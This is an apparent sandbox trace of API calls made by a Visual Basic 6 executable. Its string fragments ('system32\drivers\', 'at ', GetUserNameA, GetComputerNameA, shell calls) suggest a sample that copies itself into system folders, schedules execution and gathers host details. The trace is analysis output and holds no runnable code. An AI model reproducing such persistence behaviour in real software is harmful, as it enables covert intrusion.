
APIs

__vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0040A85E
__vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,Function_000032B6), ref: 0040A8B6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040A91C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000068), ref: 0040A97C
__vbaFreeObj.MSVBVM60 ref: 0040A9A5
__vbaEnd.MSVBVM60 ref: 0040A9BD
__vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040A9DD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040AA43
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,0000007C), ref: 0040AA9E
__vbaFreeObj.MSVBVM60 ref: 0040AAB9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406300,000001BC), ref: 0040AAFD
__vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040AB2F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014), ref: 0040AB95
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000050), ref: 0040ABF2
#618.MSVBVM60(?,00000001), ref: 0040AC10
__vbaStrMove.MSVBVM60 ref: 0040AC1B
__vbaStrCmp.MSVBVM60(00406544,00000000), ref: 0040AC27
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040AC45
__vbaFreeObj.MSVBVM60(?,?,Function_000032B6), ref: 0040AC51
__vbaNew2.MSVBVM60(00406520,0042CC34,?,?,Function_000032B6), ref: 0040AC80
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040ACE6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000050), ref: 0040AD43
__vbaStrMove.MSVBVM60 ref: 0040AD74
__vbaFreeObj.MSVBVM60 ref: 0040AD7D
__vbaNew2.MSVBVM60(00406520,0042CC34,?,?,Function_000032B6), ref: 0040ADA2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040AE08
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000050), ref: 0040AE65
__vbaStrCat.MSVBVM60(00406544,?), ref: 0040AE86
__vbaStrMove.MSVBVM60 ref: 0040AE91
__vbaFreeStr.MSVBVM60 ref: 0040AE9A
__vbaFreeObj.MSVBVM60 ref: 0040AEA3
__vbaStrCopy.MSVBVM60 ref: 0040AEB8
__vbaStrMove.MSVBVM60(?), ref: 0040AECC
__vbaStrCopy.MSVBVM60 ref: 0040AED9
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040AEE9
__vbaStrMove.MSVBVM60(00000025,?,?,?,?,?,Function_000032B6), ref: 0040AF05
__vbaStrCopy.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 0040AF12
__vbaFreeStr.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 0040AF1B
__vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,?,Function_000032B6), ref: 0040AF3B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040AFA1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000058), ref: 0040AFFE
__vbaStrCat.MSVBVM60(?,?), ref: 0040B01E
__vbaStrMove.MSVBVM60 ref: 0040B029
__vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040B035
__vbaStrMove.MSVBVM60 ref: 0040B040
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B04E
__vbaStrMove.MSVBVM60 ref: 0040B059
#517.MSVBVM60(00000000), ref: 0040B060
__vbaStrMove.MSVBVM60 ref: 0040B06B
__vbaStrCopy.MSVBVM60 ref: 0040B078
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B094
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0A0

Part of subcall function 00429CA0: __vbaSetSystemError.MSVBVM60(00000064,004031C0,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429CF6
Part of subcall function 00429CA0: #525.MSVBVM60(00000200,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D05
Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D16
Part of subcall function 00429CA0: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D20
Part of subcall function 00429CA0: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D30
Part of subcall function 00429CA0: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D3A
Part of subcall function 00429CA0: __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D43
Part of subcall function 00429CA0: #537.MSVBVM60(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D50
Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5B
Part of subcall function 00429CA0: __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D5F
Part of subcall function 00429CA0: #616.MSVBVM60(?,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D73
Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D7E
Part of subcall function 00429CA0: __vbaStrCat.MSVBVM60(00406544,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D86
Part of subcall function 00429CA0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D91
Part of subcall function 00429CA0: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429D9D
Part of subcall function 00429CA0: __vbaFreeStr.MSVBVM60(00429DEF,?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DE8

__vbaStrMove.MSVBVM60(00000024,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0B9
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0C6
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0CF
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B0F8
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B105
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B115
__vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B131
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B13C
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B14A
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B155
__vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040B161
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B16C
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B179
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B184
#517.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B18B
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B196
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0040B1A3
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B1BF
__vbaStrMove.MSVBVM60(?), ref: 0040B1EB
__vbaStrCopy.MSVBVM60 ref: 0040B1F8
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040B208
__vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B223
__vbaStrMove.MSVBVM60 ref: 0040B22E
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B23C
__vbaStrMove.MSVBVM60 ref: 0040B247
__vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040B253
__vbaStrMove.MSVBVM60 ref: 0040B25E
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040B26C
__vbaStrMove.MSVBVM60 ref: 0040B277
#517.MSVBVM60(00000000), ref: 0040B27E
__vbaStrMove.MSVBVM60 ref: 0040B289
__vbaStrCopy.MSVBVM60 ref: 0040B296
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B2B2
__vbaStrCopy.MSVBVM60 ref: 0040B2CA
__vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B2DC
__vbaStrMove.MSVBVM60(?,00000000), ref: 0040B2FC
__vbaStrCat.MSVBVM60(00000000), ref: 0040B303
__vbaStrMove.MSVBVM60 ref: 0040B30E
__vbaStrCopy.MSVBVM60 ref: 0040B31B
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040B333
__vbaStrCopy.MSVBVM60 ref: 0040B34B
__vbaStrCat.MSVBVM60(system\,00000000), ref: 0040B35D
__vbaStrMove.MSVBVM60 ref: 0040B368
__vbaStrMove.MSVBVM60(?,00000000), ref: 0040B37D
__vbaStrCat.MSVBVM60(00000000), ref: 0040B384
__vbaStrMove.MSVBVM60 ref: 0040B38F
#517.MSVBVM60(00000000), ref: 0040B396
__vbaStrMove.MSVBVM60 ref: 0040B3A1
__vbaStrCopy.MSVBVM60 ref: 0040B3AE
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040B3CA
__vbaStrCopy.MSVBVM60 ref: 0040B3E2
__vbaStrMove.MSVBVM60(?), ref: 0040B3F6
__vbaStrCopy.MSVBVM60 ref: 0040B403
__vbaOnError.MSVBVM60(000000FF,00000000), ref: 0040B43C
#669.MSVBVM60 ref: 0040B449
__vbaStrMove.MSVBVM60 ref: 0040B454
__vbaStrCopy.MSVBVM60 ref: 0040B461
__vbaFreeStr.MSVBVM60 ref: 0040B46A
__vbaStrCopy.MSVBVM60 ref: 0040B483
__vbaStrCmp.MSVBVM60(00406F10,?), ref: 0040B49C
__vbaStrCat.MSVBVM60( RU,00000000), ref: 0040B4BD
__vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000), ref: 0040B4E9
__vbaStrCat.MSVBVM60( RU,00000000), ref: 0040B502
__vbaStrMove.MSVBVM60 ref: 0040B50D
__vbaEnd.MSVBVM60(0042C0D4), ref: 0040B54C
__vbaStrMove.MSVBVM60(?), ref: 0040BA5E
__vbaStrCopy.MSVBVM60 ref: 0040BA6B
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BA7B
__vbaStrCopy.MSVBVM60 ref: 0040BA93
__vbaStrMove.MSVBVM60(?), ref: 0040BAA7
__vbaStrCopy.MSVBVM60 ref: 0040BAB4
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BAC4
__vbaStrCopy.MSVBVM60 ref: 0040BADC

Part of subcall function 00429CA0: __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429DB5

__vbaStrMove.MSVBVM60(0000001C), ref: 0040BAEE
__vbaStrMove.MSVBVM60(?,00000000), ref: 0040BB03
__vbaStrCat.MSVBVM60(00000000), ref: 0040BB0A
__vbaStrMove.MSVBVM60 ref: 0040BB15
__vbaStrCopy.MSVBVM60 ref: 0040BB22
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BB3A
__vbaStrMove.MSVBVM60(00000026), ref: 0040BB56
__vbaStrCopy.MSVBVM60 ref: 0040BB63
__vbaFreeStr.MSVBVM60 ref: 0040BB6C
__vbaStrCopy.MSVBVM60 ref: 0040BB81
__vbaStrCat.MSVBVM60(system\,00000000), ref: 0040BB93
__vbaStrMove.MSVBVM60 ref: 0040BB9E
__vbaStrMove.MSVBVM60(?,00000000), ref: 0040BBB3
__vbaStrCat.MSVBVM60(00000000), ref: 0040BBBA
__vbaStrMove.MSVBVM60 ref: 0040BBC5
#517.MSVBVM60(00000000), ref: 0040BBCC
__vbaStrMove.MSVBVM60 ref: 0040BBD7
__vbaStrCopy.MSVBVM60 ref: 0040BBE4
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040BC00
__vbaStrCopy.MSVBVM60 ref: 0040BC18
__vbaStrMove.MSVBVM60(0000001A), ref: 0040BC2A
__vbaStrMove.MSVBVM60(?,00000000), ref: 0040BC3F
__vbaStrCat.MSVBVM60(00000000), ref: 0040BC46
__vbaStrMove.MSVBVM60 ref: 0040BC51
__vbaStrCopy.MSVBVM60 ref: 0040BC5E
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BC76

Part of subcall function 0041E880: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,0040BC8B), ref: 0041E89E
Part of subcall function 0041E880: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8CE
Part of subcall function 0041E880: #525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041E8E0
Part of subcall function 0041E880: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E8EB
Part of subcall function 0041E880: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041E8FC
Part of subcall function 0041E880: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041E911
Part of subcall function 0041E880: GetComputerNameA.KERNEL32(00000000), ref: 0041E91D
Part of subcall function 0041E880: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041E92B
Part of subcall function 0041E880: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E934
Part of subcall function 0041E880: #537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041E949
Part of subcall function 0041E880: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E954
Part of subcall function 0041E880: __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041E95D
Part of subcall function 0041E880: #616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041E96D
Part of subcall function 0041E880: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E978
Part of subcall function 0041E880: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E981
Part of subcall function 0041E880: __vbaFreeStr.MSVBVM60(0041E9B5,?,?,?,00000000,Function_000032B6), ref: 0041E9AE

__vbaStrMove.MSVBVM60 ref: 0040BC90
__vbaStrCopy.MSVBVM60 ref: 0040BC9D
__vbaFreeStr.MSVBVM60 ref: 0040BCA6

Part of subcall function 0041E9D0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041E9EE
Part of subcall function 0041E9D0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA1E
Part of subcall function 0041E9D0: #525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA30
Part of subcall function 0041E9D0: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA3B
Part of subcall function 0041E9D0: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041EA4C
Part of subcall function 0041E9D0: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA61
Part of subcall function 0041E9D0: GetUserNameA.ADVAPI32(00000000), ref: 0041EA6D
Part of subcall function 0041E9D0: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA7B
Part of subcall function 0041E9D0: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA84
Part of subcall function 0041E9D0: #537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041EA99
Part of subcall function 0041E9D0: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAA4
Part of subcall function 0041E9D0: __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041EAAD
Part of subcall function 0041E9D0: #616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041EABD
Part of subcall function 0041E9D0: __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAC8
Part of subcall function 0041E9D0: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAD1
Part of subcall function 0041E9D0: __vbaFreeStr.MSVBVM60(0041EB05,?,?,?,00000000,Function_000032B6), ref: 0041EAFE

__vbaStrMove.MSVBVM60 ref: 0040BCBD
__vbaStrCopy.MSVBVM60 ref: 0040BCCA
__vbaFreeStr.MSVBVM60 ref: 0040BCD3
__vbaStrCmp.MSVBVM60(00000000,00000000), ref: 0040BCEE
#580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040BD61
__vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040BD7A
#600.MSVBVM60(00000008,00000000), ref: 0040BD90
__vbaFreeVar.MSVBVM60 ref: 0040BD9F
__vbaSetSystemError.MSVBVM60 ref: 0040BDC1
__vbaStrCopy.MSVBVM60 ref: 0040BDD6
__vbaStrMove.MSVBVM60(?), ref: 0040BDEA
__vbaStrCopy.MSVBVM60 ref: 0040BDF7
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BE07
__vbaStrCopy.MSVBVM60 ref: 0040BE1F
__vbaStrMove.MSVBVM60(?), ref: 0040BE33
__vbaStrCopy.MSVBVM60 ref: 0040BE40
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BE50
__vbaStrCopy.MSVBVM60 ref: 0040BE68
__vbaStrCat.MSVBVM60(system\,00000000), ref: 0040BE7A
__vbaStrMove.MSVBVM60 ref: 0040BE85
__vbaStrMove.MSVBVM60(?,00000000), ref: 0040BE9A
__vbaStrCat.MSVBVM60(00000000), ref: 0040BEA1
__vbaStrMove.MSVBVM60 ref: 0040BEAC
__vbaStrCopy.MSVBVM60 ref: 0040BEB9
__vbaStrCopy.MSVBVM60 ref: 0040BEE9
__vbaStrCat.MSVBVM60(system32\drivers\,00000000), ref: 0040BEFB
__vbaStrMove.MSVBVM60 ref: 0040BF06
__vbaStrMove.MSVBVM60(?,00000000), ref: 0040BF1B
__vbaStrCat.MSVBVM60(00000000), ref: 0040BF22
__vbaStrMove.MSVBVM60 ref: 0040BF2D
__vbaStrCopy.MSVBVM60 ref: 0040BF3A
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040BF52

Part of subcall function 00415EC0: __vbaSetSystemError.MSVBVM60(72A26C30,72A26A76,00000000), ref: 00415F0F
Part of subcall function 00415EC0: __vbaNew2.MSVBVM60(00406520,0042CC34,72A26C30,72A26A76,00000000), ref: 00415F27
Part of subcall function 00415EC0: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014), ref: 00415F4C
Part of subcall function 00415EC0: __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100), ref: 00415F76
Part of subcall function 00415EC0: __vbaSetSystemError.MSVBVM60(0000000D,00416130,?,00000000), ref: 00415F8F
Part of subcall function 00415EC0: __vbaFreeObj.MSVBVM60 ref: 00415F9E

Part of subcall function 00416000: __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416050
Part of subcall function 00416000: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 00416075
Part of subcall function 00416000: __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041609F
Part of subcall function 00416000: __vbaSetSystemError.MSVBVM60(0000000E,00417A20,?,00000000,?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160B8
Part of subcall function 00416000: __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 004160C7

__vbaObjSet.MSVBVM60(?,00000000), ref: 0040BF8E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407978,0000005C), ref: 0040BFD4
__vbaFreeObj.MSVBVM60 ref: 0040BFEF
__vbaStrCat.MSVBVM60(system\,00000000), ref: 0040C008
__vbaStrMove.MSVBVM60 ref: 0040C013
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C021
__vbaStrMove.MSVBVM60 ref: 0040C02C
__vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040C038
__vbaStrMove.MSVBVM60 ref: 0040C043
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C050
__vbaStrMove.MSVBVM60 ref: 0040C05B
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000), ref: 0040C088
__vbaStrCat.MSVBVM60(system\,00000000), ref: 0040C0B2
__vbaStrMove.MSVBVM60 ref: 0040C0BD
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C0CB
__vbaStrMove.MSVBVM60 ref: 0040C0D6
__vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040C0E2
__vbaStrMove.MSVBVM60 ref: 0040C0ED
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C0FB
#600.MSVBVM60(?,00000002), ref: 0040C111
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040C12B
__vbaFreeVar.MSVBVM60 ref: 0040C137
__vbaStrMove.MSVBVM60(?), ref: 0040C2F3
__vbaStrCopy.MSVBVM60 ref: 0040C300
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C310
__vbaStrMove.MSVBVM60(0000001C), ref: 0040C32C
__vbaStrCopy.MSVBVM60 ref: 0040C339
__vbaFreeStr.MSVBVM60 ref: 0040C342
__vbaStrCopy.MSVBVM60 ref: 0040C357
__vbaStrMove.MSVBVM60(?), ref: 0040C36B
__vbaStrCopy.MSVBVM60 ref: 0040C378
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C388
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C3A5
__vbaStrMove.MSVBVM60 ref: 0040C3B0
__vbaStrCopy.MSVBVM60 ref: 0040C3BD
__vbaFreeStr.MSVBVM60 ref: 0040C3C6
__vbaStrCopy.MSVBVM60 ref: 0040C3DB
__vbaStrMove.MSVBVM60(?), ref: 0040C3EF
__vbaStrCopy.MSVBVM60 ref: 0040C3FC
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C40C
__vbaLenBstr.MSVBVM60(00000000), ref: 0040C423
#616.MSVBVM60(00000000,-00000001), ref: 0040C439
__vbaStrMove.MSVBVM60 ref: 0040C444
__vbaStrCopy.MSVBVM60 ref: 0040C451
__vbaFreeStr.MSVBVM60 ref: 0040C45A
#709.MSVBVM60(00000000,00406544,000000FF,00000000), ref: 0040C477
#631.MSVBVM60(00000000,?,0000000A), ref: 0040C4AC
__vbaStrMove.MSVBVM60 ref: 0040C4B7
__vbaStrCopy.MSVBVM60 ref: 0040C4C4
__vbaFreeStr.MSVBVM60 ref: 0040C4CD
__vbaFreeVar.MSVBVM60 ref: 0040C4D6
#611.MSVBVM60 ref: 0040C4E3
#661.MSVBVM60(?,00407C78,00000000,40000000,00000008), ref: 0040C507
#705.MSVBVM60(?,00000004), ref: 0040C513
__vbaStrMove.MSVBVM60 ref: 0040C51E
__vbaStrMove.MSVBVM60(at ), ref: 0040C542
__vbaStrCat.MSVBVM60(00000000), ref: 0040C549
__vbaStrMove.MSVBVM60 ref: 0040C554
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C561
__vbaStrMove.MSVBVM60 ref: 0040C56C
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C57A
#600.MSVBVM60(00000008,00000000), ref: 0040C590
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000), ref: 0040C5AE
__vbaFreeVarList.MSVBVM60(00000003,00000008,?,00000008), ref: 0040C5C5
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C5E9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00407978,0000005C), ref: 0040C62F
__vbaFreeObj.MSVBVM60 ref: 0040C64A
__vbaStrCopy.MSVBVM60 ref: 0040C664
__vbaStrMove.MSVBVM60(?), ref: 0040C678
__vbaStrCopy.MSVBVM60 ref: 0040C686
__vbaStrMove.MSVBVM60(?), ref: 0040C69A
__vbaStrMove.MSVBVM60(00407CC4), ref: 0040C6CE
__vbaStrMove.MSVBVM60(00000000), ref: 0040C6DE
#690.MSVBVM60(00000000,00000000), ref: 0040C6EC
__vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,00000000,00000000), ref: 0040C70C
#537.MSVBVM60(000000A0,00000000), ref: 0040C727
__vbaStrMove.MSVBVM60 ref: 0040C732
__vbaStrCat.MSVBVM60(00000000), ref: 0040C739
__vbaStrMove.MSVBVM60 ref: 0040C744
__vbaStrCat.MSVBVM60(00406BFC,00000000,00000000), ref: 0040C757
__vbaStrMove.MSVBVM60 ref: 0040C762
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C770
__vbaStrMove.MSVBVM60 ref: 0040C77B

Part of subcall function 004218D0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,0040C78D,00000000,00000000), ref: 004218EE
Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042191B
Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421927
Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00421933
Part of subcall function 004218D0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00421942
Part of subcall function 004218D0: #648.MSVBVM60(0000000A), ref: 00421961
Part of subcall function 004218D0: __vbaFreeVar.MSVBVM60 ref: 00421970
Part of subcall function 004218D0: __vbaI2I4.MSVBVM60(?), ref: 00421984
Part of subcall function 004218D0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00421992
Part of subcall function 004218D0: __vbaI2I4.MSVBVM60 ref: 004219A2
Part of subcall function 004218D0: #570.MSVBVM60(00000000), ref: 004219A9
Part of subcall function 004218D0: __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219B6
Part of subcall function 004218D0: __vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004219ED
Part of subcall function 004218D0: #525.MSVBVM60(00000000), ref: 004219F4
Part of subcall function 004218D0: __vbaStrMove.MSVBVM60 ref: 004219FF
Part of subcall function 004218D0: __vbaI2I4.MSVBVM60 ref: 00421A0F
Part of subcall function 004218D0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00421A1A
Part of subcall function 004218D0: __vbaI2I4.MSVBVM60 ref: 00421A2A
Part of subcall function 004218D0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00421A37
Part of subcall function 004218D0: __vbaStrCopy.MSVBVM60 ref: 00421A4C
Part of subcall function 004218D0: __vbaStrMove.MSVBVM60(?), ref: 00421A60

__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000,00000000), ref: 0040C7A6
__vbaEnd.MSVBVM60 ref: 0040C7C1
#535.MSVBVM60(00000000), ref: 0040C7F1
__vbaStrCat.MSVBVM60(00000000,00407CCC), ref: 0040C81D
__vbaStrMove.MSVBVM60 ref: 0040C828
__vbaStrCat.MSVBVM60(00407CCC,00000000), ref: 0040C834
__vbaStrMove.MSVBVM60 ref: 0040C83F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040C84D
__vbaStrMove.MSVBVM60 ref: 0040C858
__vbaStrCat.MSVBVM60(00407CCC,00000000), ref: 0040C864
__vbaStrMove.MSVBVM60 ref: 0040C86F
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000), ref: 0040C88D
#598.MSVBVM60(0042C0D4), ref: 0040C8AE
#580.MSVBVM60(00000000,00000027), ref: 0040C908
__vbaStrCopy.MSVBVM60(00000000), ref: 0040C91D
__vbaStrMove.MSVBVM60(?), ref: 0040C931
__vbaStrCopy.MSVBVM60 ref: 0040C93F
__vbaStrMove.MSVBVM60(?), ref: 0040C953
__vbaStrMove.MSVBVM60(00407CC4), ref: 0040C987
__vbaStrMove.MSVBVM60(00000000), ref: 0040C997
#690.MSVBVM60(00000000,00000000), ref: 0040C9A4
__vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,00000000,00000000), ref: 0040C9C4
#600.MSVBVM60(00004008,00000000), ref: 0040C9F1
__vbaEnd.MSVBVM60 ref: 0040CA04

